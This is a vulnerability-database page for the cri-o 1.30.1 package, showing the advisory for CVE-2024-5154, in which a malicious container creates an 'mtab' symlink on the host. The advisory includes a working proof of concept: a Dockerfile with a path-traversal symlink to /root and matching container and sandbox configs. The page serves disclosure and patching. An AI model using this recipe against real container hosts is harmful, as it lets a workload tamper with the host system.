Staging Environment: Content and features may be unstable or change without notice.
Search for packages
Package details: pkg:golang/github.com/cri-o/cri-o@1.30.1
purl pkg:golang/github.com/cri-o/cri-o@1.30.1
Vulnerabilities affecting this package (0)
Vulnerability Summary Fixed by
This package is not known to be affected by vulnerabilities.
Vulnerabilities fixed by this package (1)
Vulnerability Summary Aliases
VCID-khm9-52xa-t3ek malicious container creates symlink "mtab" on the host External ### Impact A malicious container can affect the host by taking advantage of code cri-o added to show the container mounts on the host. A workload built from this Dockerfile: ``` FROM docker.io/library/busybox as source RUN mkdir /extra && cd /extra && ln -s ../../../../../../../../root etc FROM scratch COPY --from=source /bin /bin COPY --from=source /lib /lib COPY --from=source /extra . ``` and this container config: ``` { "metadata": { "name": "busybox" }, "image":{ "image": "localhost/test" }, "command": [ "/bin/true" ], "linux": { } } ``` and this sandbox config ``` { "metadata": { "name": "test-sandbox", "namespace": "default", "attempt": 1, "uid": "edishd83djaideaduwk28bcsb" }, "linux": { "security_context": { "namespace_options": { "network": 2 } } } } ``` will create a file on host `/host/mtab` ### Patches 1.30.1, 1.29.5, 1.28.7 ### Workarounds Unfortunately not ### References _Are there any links users can visit to find out more?_ CVE-2024-5154
GHSA-j9hf-98c3-wrm8

Date Actor Action Vulnerability Source VulnerableCode Version
2026-04-01T12:51:37.559781+00:00 GithubOSV Importer Fixing VCID-khm9-52xa-t3ek https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-j9hf-98c3-wrm8/GHSA-j9hf-98c3-wrm8.json 38.0.0